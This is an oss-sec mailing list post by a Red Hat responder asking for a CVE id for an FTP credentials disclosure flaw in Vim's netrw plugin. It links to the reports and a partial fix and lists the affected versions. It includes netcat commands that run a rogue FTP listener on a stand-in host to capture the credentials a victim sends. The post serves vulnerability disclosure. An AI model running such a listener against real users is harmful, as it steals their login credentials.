oss-sec mailing list archives
CVE request - (vim : netrw plugin - ftp user credentials disclosure)
From: Jan Lieskovsky <jlieskov () redhat com>
Date: Mon, 6 Oct 2008 06:26:24 -0400 (EDT)
Hello Steve, could you please allocate a new CVE id for the following Vim issue: Vulnerability reports: 1, http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html (This is another issue than CVE-2008-2712). 2, https://bugzilla.redhat.com/show_bug.cgi?id=461750 Thread discussing this issue: http://groups.google.com/group/vim_dev/browse_thread/thread/2f6fad581a037971/a5fcf4c4981d34e6?show_docid=a5fcf4c4981d34e6 Proposed partial fix: http://mysite.verizon.net/astronaut/vim/index.html#NETRW Affected Vim netrw plugin versions: a, Vim 7.0 autoloaded netrw plugin versions - from " Date: Jul 24, 2006, Version: 102" till the latest. b, older versions of Vim netrw may be also affected. Testcase available at: http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html (part 4. EXPLOIT) Note: Slightly modification of the testcase in the "netcat" part may be needed to successfully reproduce the issue. I was using: printf '220\r\n331\r\n' | nc -l ftp.rogue.example.com 31337 > credentials& (and for simulation of successful FTP session login the command: printf '220\r\n331\r\n230\r\n' | nc -l ftp.rogue.example 31337 > credentials &) Thanks, Jan -- Jan iankko Lieskovsky / Red Hat Security Response Team
Current thread:
- CVE request - (vim : netrw plugin - ftp user credentials disclosure) Jan Lieskovsky (Oct 06)